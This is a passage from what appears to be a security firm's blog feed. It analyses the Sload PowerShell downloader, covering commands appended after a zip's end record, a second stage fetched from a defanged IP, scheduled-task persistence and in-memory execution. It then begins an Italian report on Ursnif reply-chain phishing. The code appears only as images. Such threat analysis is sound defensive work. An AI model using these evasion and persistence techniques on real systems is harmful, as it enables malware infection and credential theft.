        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The zip file is still a legit and correctly working archive! Powershell commands are written after the EOCD (End of central directory) which determines the end of a zip file.&lt;/p&gt;
&lt;p&gt;This clever trick can deceive many signatures-based detection tools.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;4.&lt;/strong&gt;&lt;/em&gt; The extracted command is the following:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 707px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/7dbde81c708dfc966a767daf6e903ae1/394f7/SloadHits6.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 21.354166666666668%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAnUlEQVR42iVO2Q7DIAzj/z9xA3JwtBxaKwHr6xJmCWHZjhPTWwshvF9vRCJiJo4hppzPUlJKpdSUogTAA3gEQGZGFAK1dVPOkvMROIgkRlBEQjqOg0OUGUKUgPbuCtkgrrW21mak3nvYU1F0Z53Uy/KYFKKA93qTECTnnIS9NtJ136b3/rmutdYYc64551gbwr766RuK+ce2NPA8zw++b9hULNIsLwAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;SloadHits6&quot;
        title=&quot;&quot;
        src=&quot;/website/static/7dbde81c708dfc966a767daf6e903ae1/394f7/SloadHits6.png&quot;
        srcset=&quot;/website/static/7dbde81c708dfc966a767daf6e903ae1/804b2/SloadHits6.png 384w,
/website/static/7dbde81c708dfc966a767daf6e903ae1/394f7/SloadHits6.png 707w&quot;
        sizes=&quot;(max-width: 707px) 100vw, 707px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;ol start=&quot;5&quot;&gt;
&lt;li&gt;The result is the download and the execution of another powershell script from a server hosted in &lt;em&gt;&lt;strong&gt;185.17[.]27.108&lt;/strong&gt;&lt;/em&gt;. We saw different domains used but, in the last week, the Dropzone IP never changed. Also, we noted that the CnC server was blocking requests without the &quot;Microsoft BITS/7.5&quot; User-Agent to prevent unwanted download by non-infected machines.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;This script was very well detected by antivirus engines as you can see in the following image!&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 762px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/db569df9a1c55829c58a37f2bfb380c5/a016c/SloadHits7.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 66.40625%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAIAAAAmMtkJAAAACXBIWXMAAAsTAAALEwEAmpwYAAABbElEQVR42o1Sy07DMBDM/38GX8CxElcucOBQDhVISFSAVJrYsePneu2EcVJQKlHEyI/x2uvdWbt5Opiru7e+V50QwdmHV3H7Ije7z+2HnsYxl1LGssa4QrM7mM3u2Mv+2LZW6+17f/Msrx+P93s9TXCf/kCDnjPnnEESQJFTzFyJ9y54HwKGeXQO+2eR0fVQAWelavJ1aYzWmNGMtXaYJ1hijGeR4eydN8ZkZhfr3dO/0UAW4kgpHdIih7uRYTyBQFPiS8qr5kQEVcxMOA2hzmIZA1rASERz5X5Bg2otnj5ln0rgQnkkLuCwdCakXNAvOWdXy0hDZOXTEJKJ7KhyHXjfwZBt5B+HdRYNKgTBqzp9b5cihUBGJ+u42ErXdVCzWBpIatsWmSdoTvNL14GhWFk1L2mxLxBCKK1xGLxGFlJie1z9Q3BiMtEgzVzy+nuqvsfrLPwUGbJ5vmwBJ0ahtdMglNaB58hK1yMpfQEBp/SzrwbKcwAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;SloadHits7&quot;
        title=&quot;&quot;
        src=&quot;/website/static/db569df9a1c55829c58a37f2bfb380c5/a016c/SloadHits7.png&quot;
        srcset=&quot;/website/static/db569df9a1c55829c58a37f2bfb380c5/804b2/SloadHits7.png 384w,
/website/static/db569df9a1c55829c58a37f2bfb380c5/a016c/SloadHits7.png 762w&quot;
        sizes=&quot;(max-width: 762px) 100vw, 762px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;How funny was I? Static analysis is completely useless in such cases.&lt;/p&gt;
&lt;p&gt;Going forward, the malware drops the following items before deleting itself:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 708px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/acc262140f203ac238687c833cb1dfcd/3cb0f/SloadHits8.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 28.645833333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAIAAABM9SnKAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAqUlEQVR42nWQSRLDIAwE+f9HAW3gMoZrZpRUTslgy8JqLVB679d1qWprrXfhI93cW21mJiKwCKkoSGD484YjosAb1CSqapSbpjV+AYFBuW+UW/O1VmFtdzR3hFnb6IjAKsXkzLFsyXyMgOg5p9SKaTEs6ECJd59wrABRa917g+Ob+mxTpeKoQgGfY2h24HDO5Pu+n+dZv8RkyzmhOSfQiAGfd5Da/3XOeQH87U9NjyZ5dwAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;SloadHits8&quot;
        title=&quot;&quot;
        src=&quot;/website/static/acc262140f203ac238687c833cb1dfcd/3cb0f/SloadHits8.png&quot;
        srcset=&quot;/website/static/acc262140f203ac238687c833cb1dfcd/804b2/SloadHits8.png 384w,
/website/static/acc262140f203ac238687c833cb1dfcd/3cb0f/SloadHits8.png 708w&quot;
        sizes=&quot;(max-width: 708px) 100vw, 708px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Therefore it registers a task called &quot;AppRunLog&quot; to maintain persistence&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 975px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/1d0bd4b6477b61ab6614a75d54585554/e548f/SloadHits9.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 5.729166666666667%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAABCAIAAABR8BlyAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAQElEQVR42mNwkDezkzG2lzO1kzNxkDe1lwcx7GVNjAU0LUT1LMT0TIS0zIS1TYFISMtUWMtUSNtEUBPINeRVAwBBlwngd5fxeQAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;SloadHits9&quot;
        title=&quot;&quot;
        src=&quot;/website/static/1d0bd4b6477b61ab6614a75d54585554/e548f/SloadHits9.png&quot;
        srcset=&quot;/website/static/1d0bd4b6477b61ab6614a75d54585554/804b2/SloadHits9.png 384w,
/website/static/1d0bd4b6477b61ab6614a75d54585554/e5715/SloadHits9.png 768w,
/website/static/1d0bd4b6477b61ab6614a75d54585554/e548f/SloadHits9.png 975w&quot;
        sizes=&quot;(max-width: 975px) 100vw, 975px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;6.&lt;/strong&gt;&lt;/em&gt; At the end, it calls the registered task. This will execute the dropped Visual Basic Script file that, in turn, will execute the dropped Powershell script:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 709px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/9f3a718567f270064f89e6b54f295e1b/4d08a/SloadHits10.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 41.66666666666667%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAIAAAB2/0i6AAAACXBIWXMAAAsTAAALEwEAmpwYAAABAklEQVR42mWR226EMAxE+f8/bAm5hxCWwALb8LonVCBtO0IWwp7xjGli32tjnXPGGGttSiOYT2zb9vqHnwullGZISUpVydqklGJELeY855z3fT+Oo3zigxxC+Ppuna3kTkrRdVprtLzzPvS/8CHEOFSk9PpDxi8L4QfvHycYpTKHTfbfhqm3BUw1RG1b4WxFH/rYR+89ZORYvCwLhO3E+lwReoJlmecFyYZpNhutcYkEfpVSCGltuAUttLpO0lFK52nKU8bUmMZ1XRt6TEBohVBSCVEzk+Ws/AgkJPGRVtzCOnLzjI8HKZppmjhvqp84RxriwJ2xeketaa+Xfdu3C6WUNxHXt7/jb2h2AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;SloadHits10&quot;
        title=&quot;&quot;
        src=&quot;/website/static/9f3a718567f270064f89e6b54f295e1b/4d08a/SloadHits10.png&quot;
        srcset=&quot;/website/static/9f3a718567f270064f89e6b54f295e1b/804b2/SloadHits10.png 384w,
/website/static/9f3a718567f270064f89e6b54f295e1b/4d08a/SloadHits10.png 709w&quot;
        sizes=&quot;(max-width: 709px) 100vw, 709px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;This script parses arguments and it won&apos;t execute properly in case they are not what it expects. It needs the numbers from 1 to 16 as arguments because, in fact, they are the key to decrypt the last stage.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;7.&lt;/strong&gt;&lt;/em&gt; The final payload is decrypted from the &quot;config.ini&quot; file and is called with &quot;Invoke-Expression&quot;. It&apos;s loaded directly in memory: this makes very difficult for antivirus products to detect the threat. At the moment, this execution method is widely known as &quot;&lt;em&gt;&lt;strong&gt;fileless&lt;/strong&gt;&lt;/em&gt;&quot; because, indeed, the malware is never written on disk.&lt;/p&gt;
&lt;p&gt;The payload is the last (finally) powershell script: it is the real &lt;em&gt;&lt;strong&gt;Sload downloader&lt;/strong&gt;&lt;/em&gt; which performs various malicious steps that were already explained in details in the article written by &lt;a href=&quot;https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy&quot;&gt;Proofpoint&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 692px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/89985a5308f6410a85ababd7412af5b8/91e7e/SloadHits11.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 70.57291666666667%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAIAAACgpqunAAAACXBIWXMAAAsTAAALEwEAmpwYAAABhElEQVR42o1Sy2odMQyd//+MrkMWgZKuAllk01VDSEPIA0qgvR6PZXv8GPldeW5uOwm5kAN+SPaxZOkMp9e7L99fnIYd497MVw+7y0c4u2Ffb9lvja21Wms7guHbHb+4HzWIkQsFcP2LXz7B+U9+8uOPcHElt6NkGiWnUgptUkfMKa2eHDoiYkAaG9QDhpQLSOmcJ7LWmk8TmVJpqVRfldKKEoK+yu6hO/8+MlBMa61zjgya59mEGNrn0MmaHlfKe79kn0pqn8ZAOVAyAmBBNMb0PFfQfp0tndK7R8kEin+oQtmY/51ry95jcNZShBBQushNUD6Ci0vM3KDB/AL2eVSYivLpA3LJhfpDoWIudCnmGnLJtc+pVB+SwVhqo6Z8kLaZDdsx6u32yX3bzTyDgC6E8vqX/QaEmKZpJRvDGKNqxRi3SiATrPDow8EfV1CaEmBkIymn/5mEsSnYK1ptM84kt3eV2mckhMg5D9aYkY8kj67MDVJM0skFl/gWdI20xzlHxL/ClC1myZR7OgAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;SloadHits11&quot;
        title=&quot;&quot;
        src=&quot;/website/static/89985a5308f6410a85ababd7412af5b8/91e7e/SloadHits11.png&quot;
        srcset=&quot;/website/static/89985a5308f6410a85ababd7412af5b8/804b2/SloadHits11.png 384w,
/website/static/89985a5308f6410a85ababd7412af5b8/91e7e/SloadHits11.png 692w&quot;
        sizes=&quot;(max-width: 692px) 100vw, 692px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;In few words, Sload can:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Load external binaries&lt;/li&gt;
&lt;li&gt;Take screenshots&lt;/li&gt;
&lt;li&gt;Update configuration and CnC servers&lt;/li&gt;
&lt;li&gt;List running processes&lt;/li&gt;
&lt;li&gt;Detect Outlook usage&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The variant we spotted in the last week uses the following CnC domains, which resolve in the same IP used by the second downloader stage &lt;em&gt;&lt;strong&gt;(185.17[.]27.108)&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 708px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/d4fb50eea6ce8b97be06c8fb6fed2f1b/3cb0f/SloadHits12.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 11.458333333333334%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAIAAADXZGvcAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAN0lEQVR42o3LOw4AIAgEUe9/SJFA+IRKE7fWIzDF62ZU1SSKSBU189sOwMjMxfx1dxHd5wDd+QHJEnEM/SY49wAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;SloadHits12&quot;
        title=&quot;&quot;
        src=&quot;/website/static/d4fb50eea6ce8b97be06c8fb6fed2f1b/3cb0f/SloadHits12.png&quot;
        srcset=&quot;/website/static/d4fb50eea6ce8b97be06c8fb6fed2f1b/804b2/SloadHits12.png 384w,
/website/static/d4fb50eea6ce8b97be06c8fb6fed2f1b/3cb0f/SloadHits12.png 708w&quot;
        sizes=&quot;(max-width: 708px) 100vw, 708px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;However, we expect that this configuration won&apos;t last long, because, as we said before, Sload is able to update his CnC servers at any time.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;
We had a fantastic journey that made us understand, hopefully, how powerful can be Powershell and how attackers are misusing this tool to evade analysis detection.&lt;/p&gt;
&lt;p&gt;We analyzed 5 different powershell scripts and that was only the &quot;downloader&quot; phase of the infection.&lt;/p&gt;
&lt;p&gt;In case of a successfull one, Sload was seen to download known malware like Ramnit, Gootkit, DarkVNC or Ursnif (reference: Proofpoint). At that stage the threat would be really important.&lt;/p&gt;
&lt;p&gt;Certego is monitoring the campaign and it&apos;s updating its signatures to correctly detect possible infections.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;IOC&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1428px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/0d8fc7cc5d17cc1da275c532d8819491/ccf0c/SloadHits13.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 75.26041666666667%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAIAAABr+ngCAAAACXBIWXMAABYlAAAWJQFJUiTwAAABeElEQVR42n2T23KCQBBE/f+vCxLuaAh7USmCCshGn3LcMYVVkvTD1jBsz3Q3uuq6br/fa2OstUrpw+FgfL3b7ZRS1mMYhssLpmlawSyKIs/zWtXd1x3H47Hv+/P5THE6nSjGcVwma63X6zXkNE2Zst1u2cyq7ydclnAnW2uyLIVTlmVd17homqZtW9ZyIoTOn7Lxxs6yZGtBsfHAJ+YRhQp8oZyry56TJIEAk53Yw7CovV6vt9uN4pU5b/7w+PRAKh0mMojl1GT2j2dLYFmWcZV7YhWfFJzUi4YfZFwhuKoqlOPNOTd5yGsp5FONv5jJJLwpN9gmcF7g0HksFs/+57TjOGYKVo0HOfOII1LQRnOHpvIgC2isuZN5DoI3bEdxxE8FCWEYvntEUcRQTposkI6xBhUPMlNJC5pEDUhO0pZfC5CCkz5BzpuRFwSBSKJGHuHx5eSRibUHRugQKqNnMiO5AUc+L8AqVzmpIVBDkL8XNfeRTWDOuR+F4TmvKClrjgAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;SloadHits13&quot;
        title=&quot;&quot;
        src=&quot;/website/static/0d8fc7cc5d17cc1da275c532d8819491/ccf0c/SloadHits13.png&quot;
        srcset=&quot;/website/static/0d8fc7cc5d17cc1da275c532d8819491/804b2/SloadHits13.png 384w,
/website/static/0d8fc7cc5d17cc1da275c532d8819491/e5715/SloadHits13.png 768w,
/website/static/0d8fc7cc5d17cc1da275c532d8819491/ccf0c/SloadHits13.png 1428w&quot;
        sizes=&quot;(max-width: 1428px) 100vw, 1428px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Mailsnif]]></title><description><![CDATA[Nelle ultime settimane i sistemi di monitoraggio Certego hanno rilevato un significativo aumento nella diffusione del malware Ursnif]]></description><link>https://www.certego.net/blog/mailsnif/</link><guid isPermaLink="false">mailsnif</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><category><![CDATA[Malware]]></category><pubDate>Thu, 19 Apr 2018 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Nelle ultime settimane i sistemi di monitoraggio Certego hanno rilevato un significativo aumento nella diffusione del malware &lt;em&gt;&lt;strong&gt;Ursnif&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;Questo aumento è dovuto al particolare sistema di &lt;em&gt;&lt;strong&gt;spear phishing&lt;/strong&gt;&lt;/em&gt; recentemente impiegato per diffondere tale malware. Questo sistema, già segnalato lo scorso Novembre da Barkly e ripreso questo mese da &lt;a href=&quot;https://www.libraesva.com/attaching-malware-to-email-replies-is-very-effective/&quot;&gt;Libraesva&lt;/a&gt; e &lt;a href=&quot;https://www.lantechlongwave.it/un-attacco-informatico-trojan-ursnif-arriva-via-mail-dai-vostri-contatti/&quot;&gt;Metis&lt;/a&gt;, si basa su una tecnica che possiamo definire di &lt;em&gt;&lt;strong&gt;thread injection&lt;/strong&gt;&lt;/em&gt;: la vittima si vede recapitare un messaggio email come risposta ad una precedente conversazione con un suo contatto, con tanto di citazioni dei messaggi precedenti e firma del mittente, in cui si invita l&apos;ignaro e fiducioso destinatario ad aprire il documento allegato.&lt;/p&gt;
&lt;p&gt;Come è facile immaginare, l&apos;allegato in questione, spesso in formato doc di Microsoft Word, in questione contiene in realtà delle &lt;em&gt;&lt;strong&gt;MACRO&lt;/strong&gt;&lt;/em&gt; il cui scopo è scaricare da un server remoto una copia del malware Ursnif e così infettare un altro host.&lt;/p&gt;
&lt;p&gt;Come anticipato, i vantaggi di questa tecnica di phishing sono evidenti: il rapporto di fiducia che esiste tra le utenze riduce l&apos;attenzione della vittima finale quando questa riceve il documento malevolo. Esiste però anche un altro vantaggio rispetto allo spam &quot;tradizionale&quot;: si vengono a colpire esclusivamente utenti attivi e, contemporaneamente, si aggirano i sistemi di raccolta passivi dello spam.&lt;/p&gt;
&lt;p&gt;Tuttavia, finora non si avevano prove certe su come operasse il malware per recuperare tali informazioni. Essendo Ursnif un malware la cui principale funzione consiste nel manomettere le connessioni verso i siti bancari (&lt;em&gt;&lt;strong&gt;session hijacking&lt;/strong&gt;&lt;/em&gt;), era abbastanza facile supporre che effettuasse la stessa operazione verso i client di posta e/o le webmail; così da raccogliere alcune conversazioni e inviare le mail di phishing sopra descritte. Il malware è così riuscito a &lt;em&gt;&lt;strong&gt;trasformare le sue vittime in complici&lt;/strong&gt;&lt;/em&gt;, per quanto ignari, della sua propagazione.&lt;/p&gt;
&lt;p&gt;In questi giorni è però emerso un fatto interessante. Durante la sua attività di analisi di un esemplare di Ursnif, il ricercatore noto come  &lt;em&gt;&lt;strong&gt;JAMESWT&lt;/strong&gt;&lt;/em&gt; ha individuato su uno dei server utilizzati per distribuire gli eseguibili del malware una cartella contenente numerose informazioni relative ad account di posta.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 598px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/f479472371f894823838c278123d8dfe/0c69d/Mailsnif1.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 54.166666666666664%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAIAAADwazoUAAAACXBIWXMAAA7EAAAOxAGVKw4bAAABrUlEQVR42o2S246bMBRF83X9kKrf0Z+qVA0PrTRETAvmjk2wQwAD4ZIMSeiQconBJZOHZqSp1KP1cLy1t4587EX/8mJ8/kSWguuHAKiEkHEc+f/V4nSovnz8kIhf93VD06x8PtTNeRynaeJX+JV/hi+cJ90UnlnWzO2ddbpv39TfcMcmuxqsqsenS9WNeTsmZ7Y9M9owr2ZRc2X2vD+5Hy5KWMK41ILMSXZGmFvxzoh3ZpjPCkpKnD2X1SErirzIk3Tbdd1duO+RbbsQIsfRVRD4xEMQWpa3ck1dC32/LPI0TSmlYRgFQdi27Zsw9jBCLiFrVdOybQaha5jW7IPIretftzvz+13ceA0PeBO4ZO1H1MVkW5SbiGJ/sw4juMLlfj8w9ns2sXfeb9HGCfr2XReE1aNIFWA8CER6ogB44lJ/mMXHaBYFwRPFjtKW0i6OhzjmVfW67SCwVc3RTROouqwg04KGiQzT0XXthzwfN54XeNi1LFvTTQB0WSbuiicJZ2zRzX9KVhxJQtITloElLgkAUJJ8TcOyghXF+ym3RTGdTtPxMB2PNzilfBz/AJKOV79ehkp+AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Mailsnif1&quot;
        title=&quot;&quot;
        src=&quot;/website/static/f479472371f894823838c278123d8dfe/0c69d/Mailsnif1.png&quot;
        srcset=&quot;/website/static/f479472371f894823838c278123d8dfe/804b2/Mailsnif1.png 384w,
/website/static/f479472371f894823838c278123d8dfe/0c69d/Mailsnif1.png 598w&quot;
        sizes=&quot;(max-width: 598px) 100vw, 598px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;L&apos;analisi del contenuto della cartella indicata da JAMESWT ha portato alla luce una serie di file testuali in cui erano presenti accurate informazioni per accedere a diversi account di posta compromessi. &lt;em&gt;&lt;strong&gt;Per ciascuna utenza sono riportati: nome utente, password, indirizzo del server email e protocollo di accesso&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1132px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/a3a294418ef0275545d65dd01430a056/ae953/Mailsnif2.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 8.072916666666668%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAIAAADXZGvcAAAACXBIWXMAABYlAAAWJQFJUiTwAAAAV0lEQVR42jWMOQ7AIAwE8/9PxhjMIQ5BAXVGibLVeFfjy8zGGLXWGCOsqq01e+P/pJRY6QHOtdY5Z+99hRB676UU5xyC3JJzVq8iQsPKO3oAGROec37yA9aZbJfzi/PSAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Mailsnif2&quot;
        title=&quot;&quot;
        src=&quot;/website/static/a3a294418ef0275545d65dd01430a056/ae953/Mailsnif2.png&quot;
        srcset=&quot;/website/static/a3a294418ef0275545d65dd01430a056/804b2/Mailsnif2.png 384w,
/website/static/a3a294418ef0275545d65dd01430a056/e5715/Mailsnif2.png 768w,
/website/static/a3a294418ef0275545d65dd01430a056/ae953/Mailsnif2.png 1132w&quot;
        sizes=&quot;(max-width: 1132px) 100vw, 1132px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
